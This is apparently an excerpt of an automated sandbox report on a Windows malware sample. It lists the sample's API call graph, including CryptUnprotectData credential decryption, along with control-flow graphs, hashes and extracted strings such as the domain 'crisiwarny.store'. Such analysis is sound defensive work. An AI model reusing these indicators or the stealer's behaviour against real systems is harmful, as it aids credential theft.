4abcf0 21229->21230 21230->21230 21231 4abd18 SysAllocString 21230->21231 21232 4abd45 21231->21232 21233 4ac09a SysFreeString SysFreeString 21232->21233 21234 4abd55 CoSetProxyBlanket 21232->21234 21235 4abd79 21232->21235 21237 4ac0b0 21232->21237 21245 4ac10f 21232->21245 21248 4ac107 21232->21248 21233->21237 21234->21233 21234->21235 21234->21237 21234->21245 21234->21248 21235->21233 21235->21245 21235->21248 21236 4ac332 21242 4ae210 RtlFreeHeap 21236->21242 21240 4ac0e6 GetVolumeInformationW 21237->21240 21238 4ae700 LdrInitializeThunk 21239 4ac2ce 21238->21239 21239->21236 21239->21238 21243 4ae510 LdrInitializeThunk 21239->21243 21239->21248 21252 4ae650 LdrInitializeThunk 21239->21252 21240->21245 21240->21248 21241 4ae1b0 RtlAllocateHeap 21247 4ac243 21241->21247 21244 4ac338 21242->21244 21243->21239 21244->21248 21253 4b0f10 LdrInitializeThunk 21244->21253 21245->21236 21245->21239 21245->21241 21245->21248 21247->21239 21251 4b0f10 LdrInitializeThunk 21247->21251 21248->21248 21251->21239 21252->21239 21253->21248 21254 4a0dad 21256 4a0dcb 21254->21256 21255 4a0eab FreeLibrary 21256->21255 21257 480ca0 CoInitializeSecurity 21259 480cc2 21257->21259 21258 48103d 21259->21258 21260 4ae210 RtlFreeHeap 21259->21260 21260->21259 21261 495160 21262 4951b0 21261->21262 21263 49516e 21261->21263 21267 495270 21263->21267 21265 49522c 21265->21262 21266 493770 LdrInitializeThunk 21265->21266 21266->21262 21268 495280 21267->21268 21268->21268 21269 4b46d0 LdrInitializeThunk 21268->21269 21270 49535f 21269->21270 21271 4b11e1 21272 4b11e0 21271->21272 21272->21271 21274 4b11ee 21272->21274 21277 4b0f10 LdrInitializeThunk 21272->21277 21276 4b0f10 LdrInitializeThunk 21274->21276 21276->21274 21277->21274 21278 48f522 21282 48f520 21278->21282 21279 48f696 21284 491100 LdrInitializeThunk 21279->21284 21280 48f6e8 21282->21278 21282->21279 21282->21280 21283 4b46d0 LdrInitializeThunk 21282->21283 21283->21282 21285 496022 21287 496046 21285->21287 21288 4961d8 21287->21288 21289 4b0f10 LdrInitializeThunk 21287->21289 21289->21287 21290 495b27 21291 495b2f 21290->21291 21292 4ae1b0 RtlAllocateHeap 21291->21292 21293 495b5a 21292->21293 21295 495c56 21293->21295 21296 4b0f10 LdrInitializeThunk 21293->21296 21296->21293 21297 4b0e25 21298 4b0ee8 21297->21298 21299 4b0e33 21297->21299 21300 4b0e41 RtlReAllocateHeap 21297->21300 21301 4b0ee0 21297->21301 21303 4ae210 RtlFreeHeap 21298->21303 21299->21298 21299->21300 21305 4b0ee6 21300->21305 21302 4ae1b0 RtlAllocateHeap 21301->21302 21302->21305 21303->21305 21306 48d7f8 21307 48d7fd 21306->21307 21308 4b4880 LdrInitializeThunk 21307->21308 21309 48d80c 21308->21309 21310 4b4950 LdrInitializeThunk 21309->21310 21311 48d849 21309->21311 21313 48db7e 21309->21313 21315 48d90e 21309->21315 21310->21311 21311->21313 21311->21315 21316 4b0f10 LdrInitializeThunk 21311->21316 21314 48db5f CryptUnprotectData 21314->21313 21315->21313 21315->21314 21316->21315 21317 481bfc 21319 481a5a 21317->21319 21318 481e18 21319->21317 21319->21318 21320 4ae210 RtlFreeHeap 21319->21320 21320->21319 21321 4b5670 21322 4b5681 21321->21322 21323 4b572e 21322->21323 21331 4b0f10 LdrInitializeThunk 21322->21331 21324 4b58f4 21323->21324 21326 4ae1b0 RtlAllocateHeap 21323->21326 21327 4b5797 21326->21327 21329 4b583e 21327->21329 21332 4b0f10 LdrInitializeThunk 21327->21332 21328 4ae210 RtlFreeHeap 21328->21324 21329->21328 21331->21323 21332->21329 21333 4b4d70 21334 4b4d90 21333->21334 21336 4b4dee 21334->21336 21343 4b0f10 LdrInitializeThunk 21334->21343 21335 4b502c 21336->21335 21337 4ae1b0 RtlAllocateHeap 21336->21337 21340 4b4e88 21337->21340 21339 4ae210 RtlFreeHeap 21339->21335 21342 4b4eff 21340->21342 21344 4b0f10 LdrInitializeThunk 21340->21344 21342->21339 21342->21342 21343->21336 21344->21342 21346 4b1336 21347 4b1360 21346->21347 21348 4b13ae 21347->21348 21352 4b0f10 LdrInitializeThunk 21347->21352 21348->21348 21351 4b0f10 LdrInitializeThunk 21348->21351 21351->21348 21352->21348

                                                                                          Executed Functions

                                                                                          Function 0047EC20 Relevance: 20.4, Strings: 16, Instructions: 397COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 8 47ec20-47ec51 9 47ec60-47eca2 8->9 9->9 10 47eca4-47ed9f 9->10 11 47eda0-47eda8 10->11 11->11 12 47edaa-47eddf 11->12 13 47ede0-47ee1f 12->13 13->13 14 47ee21-47ee46 call 47fa80 13->14 16 47ee4b-47ee50 14->16 17 47ee56-47ee79 16->17 18 47efb4-47efb6 16->18 19 47ee80-47eed2 17->19 20 47f13a-47f146 18->20 19->19 21 47eed4-47eeda 19->21 22 47eee0-47eeea 21->22 23 47eef1-47eef5 22->23 24 47eeec-47eeef 22->24 25 47f131-47f137 call 4ae210 23->25 26 47eefb-47ef1f 23->26 24->22 24->23 25->20 28 47ef20-47ef67 26->28 28->28 30 47ef69-47ef79 28->30 31 47efbb-47efbd 30->31 32 47ef7b-47ef81 30->32 33 47efc3-47efff 31->33 34 47f12f 31->34 35 47ef97-47ef9b 32->35 37 47f000-47f025 33->37 34->25 35->34 36 47efa1-47efa8 35->36 38 47efae 36->38 39 47efaa-47efac 36->39 37->37 40 47f027-47f033 37->40 41 47ef90-47ef95 38->41 42 47efb0-47efb2 38->42 39->38 43 47f035-47f03f 40->43 44 47f074-47f076 40->44 41->31 41->35 42->41 46 47f057-47f05b 43->46 44->34 45 47f07c-47f099 44->45 47 47f0a0-47f0ba 45->47 46->34 48 47f061-47f068 46->48 47->47 49 47f0bc-47f0c6 47->49 50 47f06e 48->50 51 47f06a-47f06c 48->51 52 47f100-47f102 49->52 53 47f0c8-47f0d7 49->53 54 47f050-47f055 50->54 55 47f070-47f072 50->55 51->50 57 47f10c-47f12d call 47e990 52->57 56 47f0e7-47f0eb 53->56 54->44 54->46 55->54 56->34 58 47f0ed-47f0f4 56->58 57->25 60 47f0f6-47f0f8 58->60 61 47f0fa 58->61 60->61 63 47f0e0-47f0e5 61->63 64 47f0fc-47f0fe 61->64 63->56 65 47f104-47f10a 63->65 64->63 65->34 65->57
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: &A-C$5Q<S$6$6E+G$7U9W$8]S_$<Y?[$>M"O$E-A/$I)^+$M%E'$O9M;$P!N#$dc$eI?K$jabc
                                                                                          • API String ID: 0-600622405
                                                                                          • Opcode ID: e284a7a31720b81371ea60283e70b7001730d1baa65b831a1f027a04994089f2
                                                                                          • Instruction ID: 5b208a6059804183d060f48d381a912446aab6ddc66af6ec5c92a326f9c93a37
                                                                                          • Opcode Fuzzy Hash: e284a7a31720b81371ea60283e70b7001730d1baa65b831a1f027a04994089f2
                                                                                          • Instruction Fuzzy Hash: 5DD1277160C3918FC324CF65D4903ABBBE1ABC5304F18C96EE4D94B342D779890ACB96
                                                                                          Function 004ABCA9 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 350memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 126 4abca9-4abcef 127 4abcf0-4abd16 126->127 127->127 128 4abd18-4abd4e SysAllocString 127->128 130 4abf0a-4abf6f 128->130 131 4abec9-4abee5 128->131 132 4ac06f-4ac078 call 47c890 128->132 133 4ac10f-4ac119 128->133 134 4abfcc-4ac00b call 4a21d0 call 47c880 call 47d2b0 128->134 135 4ac062 128->135 136 4ac020-4ac04b 128->136 137 4ac107-4ac10e 128->137 138 4ac0ba-4ac100 call 4b3a90 GetVolumeInformationW 128->138 139 4ac09a-4ac0ac SysFreeString * 2 128->139 140 4ac07b-4ac08c 128->140 141 4abd79-4abd96 128->141 142 4ac052-4ac05b 128->142 143 4ac0b0-4ac0b6 128->143 144 4ac090-4ac096 128->144 145 4abd55-4abd72 CoSetProxyBlanket 128->145 158 4abf70-4abf94 130->158 150 4abee9-4abf03 131->150 132->140 148 4ac120-4ac13a 133->148 134->132 134->133 134->135 134->136 134->137 134->140 134->142 135->132 136->132 136->133 136->135 136->137 136->140 136->142 138->133 138->137 139->143 140->144 147 4abda0-4abdc8 141->147 142->132 142->133 142->135 142->136 142->137 142->140 142->142 143->138 144->139 145->130 145->131 145->132 145->133 145->134 145->135 145->136 145->137 145->139 145->140 145->141 145->142 145->143 145->144 147->147 154 4abdca-4abe53 147->154 148->137 160 4ac14f-4ac159 148->160 161 4ac160-4ac165 148->161 162 4ac141-4ac148 148->162 150->130 150->132 150->133 150->134 150->135 150->136 150->137 150->140 150->142 150->144 192 4abe60-4abe90 154->192 158->158 164 4abf96-4abfab 158->164 160->161 169 4ac32a-4ac32f 160->169 170 4ac3ec-4ac42d call 4ae4e0 160->170 171 4ac180 160->171 172 4ac440-4ac44a call 4ae510 160->172 173 4ac1e1-4ac1e6 160->173 174 4ac466-4ac46e call 4ae700 160->174 175 4ac486-4ac48e 160->175 176 4ac239-4ac25b call 4ae1b0 160->176 177 4ac45c 160->177 178 4ac172-4ac174 160->178 179 4ac1d2-4ac1da 160->179 180 4ac232-4ac234 160->180 181 4ac332-4ac34b call 4ae210 160->181 182 4ac473-4ac480 call 4ae700 160->182 183 4ac170 160->183 184 4ac1d0 160->184 185 4ac1f0 160->185 186 4ac330 160->186 187 4ac450-4ac455 160->187 188 4ac3d0 160->188 189 4ac311-4ac323 160->189 190 4ac1f6-4ac1fa 160->190 191 4ac436-4ac43b call 4ae510 160->191 161->183 162->160 162->161 207 4abfaf-4abfc5 164->207 169->186 170->191 198 4ac183-4ac1a7 call 492dd0 171->198 172->187 199 4ac1c0-4ac1c6 173->199 174->182 197 4ac3d4-4ac3e5 call 4ae650 175->197 219 4ac260-4ac2a2 176->219 177->174 178->198 179->169 179->170 179->172 179->173 179->174 179->175 179->176 179->177 179->180 179->181 179->182 179->185 179->186 179->187 179->188 179->189 179->190 179->191 201 4ac4b2-4ac4b9 180->201 220 4ac350-4ac392 181->220 182->175 184->179 185->190 187->174 187->175 187->177 187->182 187->188 209 4ac787-4ac797 187->209 188->197 189->169 189->170 189->172 189->174 189->175 189->177 189->181 189->182 189->186 189->187 189->188 189->191 190->148 191->172 192->192 204 4abe92-4abeb5 192->204 197->169 197->170 197->172 197->174 197->175 197->177 197->181 197->182 197->186 197->187 197->188 197->191 197->209 224 4ac1b0-4ac1b8 198->224 199->184 231 4abeb9-4abec2 204->231 207->132 207->133 207->134 207->135 207->136 207->137 207->140 207->142 217 4ac799 209->217 217->217 219->219 225 4ac2a4-4ac2b0 219->225 220->220 223 4ac394-4ac39c 220->223 229 4ac4ad-4ac4b0 223->229 230 4ac3a2-4ac3af 223->230 224->224 226 4ac1ba-4ac1bf 224->226 227 4ac2fa-4ac30a 225->227 228 4ac2b2-4ac2ba 225->228 226->199 227->169 227->170 227->172 227->174 227->175 227->177 227->181 227->182 227->186 227->187 227->188 227->189 227->191 232 4ac2c0-4ac2c7 228->232 229->201 233 4ac3b0-4ac3b7 230->233 231->130 231->131 231->132 231->133 231->134 231->135 231->136 231->137 231->139 231->140 231->142 231->144 234 4ac2c9-4ac2cc 232->234 235 4ac2d0-4ac2d6 232->235 236 4ac3bd-4ac3c0 233->236 237 4ac493-4ac499 233->237 234->232 238 4ac2ce 234->238 235->227 239 4ac2d8-4ac2f7 call 4b0f10 235->239 236->233 240 4ac3c2 236->240 237->229 241 4ac49b-4ac4aa call 4b0f10 237->241 238->227 239->227 240->229 241->229
                                                                                          APIs
                                                                                          • SysAllocString.OLEAUT32(49FB4BE2), ref: 004ABD1D
                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004ABD68
                                                                                          • SysFreeString.OLEAUT32(?), ref: 004AC0A4
                                                                                          • SysFreeString.OLEAUT32(?), ref: 004AC0AA
                                                                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,49FB4BE2,00000000,00000000,00000000,00000000), ref: 004AC0F7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                          • String ID: WC$ZQ
                                                                                          • API String ID: 1773362589-1722601914
                                                                                          • Opcode ID: ecd9dfa0692d2d960993815b823b72d74c226f22262a7c7d91a0e12fbcb4b662
                                                                                          • Instruction ID: 9cfe2c5b4f9aab75729ea8dd4af0ad7892a0225d1b5023a662023591cfd649d4
                                                                                          • Opcode Fuzzy Hash: ecd9dfa0692d2d960993815b823b72d74c226f22262a7c7d91a0e12fbcb4b662
                                                                                          • Instruction Fuzzy Hash: D2C1DC72A08341ABE310CF60D845B5FBBE5FFC6314F10896CF1849B2A1DB75990ACB86
                                                                                          Function 0047E1A0 Relevance: 11.8, Strings: 9, Instructions: 540COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 246 47e1a0-47e1bf 247 47e1c0-47e1ef 246->247 247->247 248 47e1f1-47e22f 247->248 249 47e230-47e263 248->249 249->249 250 47e265-47e26c 249->250 251 47e26f-47e27d call 4afc50 250->251 254 47e485-47e491 251->254 255 47e284-47e286 251->255 256 47e3e2-47e3ea 251->256 257 47e602-47e64f 251->257 258 47e3e0 251->258 259 47e3c0-47e3c5 251->259 260 47e5ee-47e5f2 251->260 261 47e3cc-47e3d4 251->261 262 47e28b-47e3be call 4b3a90 * 12 251->262 263 47e449-47e456 251->263 264 47e5f7 251->264 265 47e3f1-47e415 call 4ac620 call 47e990 251->265 266 47e430-47e436 call 47ec20 251->266 267 47e43f-47e442 251->267 268 47e41e-47e427 call 47ec20 251->268 269 47e5fc 251->269 270 47e498-47e59f 251->270 254->257 254->260 254->264 254->269 254->270 271 47e736-47e73b 254->271 272 47e742-47e749 254->272 273 47e740 254->273 274 47e66f-47e6bf 254->274 279 47e97b-47e985 255->279 256->254 256->257 256->259 256->260 256->261 256->263 256->264 256->265 256->266 256->267 256->268 256->269 256->270 256->271 256->272 256->273 256->274 277 47e650-47e66d 257->277 258->256 259->254 259->257 259->260 259->261 259->264 259->269 259->270 259->271 259->272 259->273 259->274 276 47e976-47e978 260->276 261->258 262->258 283 47e471-47e47e 263->283 284 47e458-47e45a 263->284 264->269 265->268 266->267 267->254 267->257 267->259 267->260 267->261 267->263 267->264 267->269 267->270 267->271 267->272 267->273 267->274 268->266 275 47e5a0-47e5cf 270->275 271->273 291 47e8b6-47e8d4 call 47e990 272->291 292 47e962-47e974 call 4ae210 272->292 293 47e952-47e957 272->293 294 47e852-47e859 272->294 295 47e750-47e771 272->295 296 47e810-47e818 272->296 297 47e850 272->297 298 47e860-47e878 272->298 286 47e6c0-47e6dd 274->286 275->275 285 47e5d1-47e5e7 call 47f190 275->285 276->279 277->274 277->277 283->254 283->257 283->260 283->261 283->264 283->269 283->270 283->271 283->272 283->273 283->274 299 47e460-47e46f 284->299 285->257 285->260 285->269 285->271 285->272 285->273 285->274 285->291 285->292 285->293 285->294 285->295 285->296 285->297 285->298 286->286 302 47e6df-47e6ea 286->302 307 47e950 291->307 292->276 308 47e960 293->308 294->291 294->298 313 47e780-47e7c3 295->313 301 47e820-47e82a 296->301 298->292 298->293 304 47e892-47e8b4 298->304 305 47e840-47e84f 298->305 306 47e890 298->306 298->307 298->308 309 47e87f-47e882 298->309 299->283 299->299 301->301 315 47e82c-47e83e 301->315 316 47e720 302->316 317 47e6ec-47e6f0 302->317 304->305 305->297 307->293 309->306 313->313 322 47e7c5-47e7ce 313->322 315->297 329 47e728 316->329 325 47e707-47e70b 317->325 323 47e802-47e809 322->323 324 47e7d0-47e7da 322->324 323->291 323->293 323->294 323->296 323->297 323->298 327 47e7e7-47e7eb 324->327 328 47e70d-47e714 325->328 325->329 331 47e800 327->331 332 47e7ed-47e7f4 327->332 333 47e716-47e718 328->333 334 47e71a 328->334 341 47e730 329->341 331->323 336 47e7f6-47e7f8 332->336 337 47e7fa 332->337 333->334 338 47e700-47e705 334->338 339 47e71c-47e71e 334->339 336->337 342 47e7e0-47e7e5 337->342 343 47e7fc-47e7fe 337->343 338->325 338->341 339->338 341->271 342->323 342->327 343->342
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: BG$Ehrd$RG$bG$crisiwarny.store$i[k]$n|of$txLL$G
                                                                                          • API String ID: 0-4129233017
                                                                                          • Opcode ID: 40f401c9f44581ca63b52642439a1ab59c7072fb9dc8f3c449264201d5d8cae4
                                                                                          • Instruction ID: fe96d80a29e20f4ade6a44ba52e82dbe2f7242af1cbb0aca65b38a260ce43606
                                                                                          • Opcode Fuzzy Hash: 40f401c9f44581ca63b52642439a1ab59c7072fb9dc8f3c449264201d5d8cae4
                                                                                          • Instruction Fuzzy Hash: C5022B755083408FD304DF26DC413ABBBF1EB99308F148A7DE5899B362D7398909CB5A
                                                                                          Function 00480460 Relevance: 11.7, Strings: 9, Instructions: 454COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
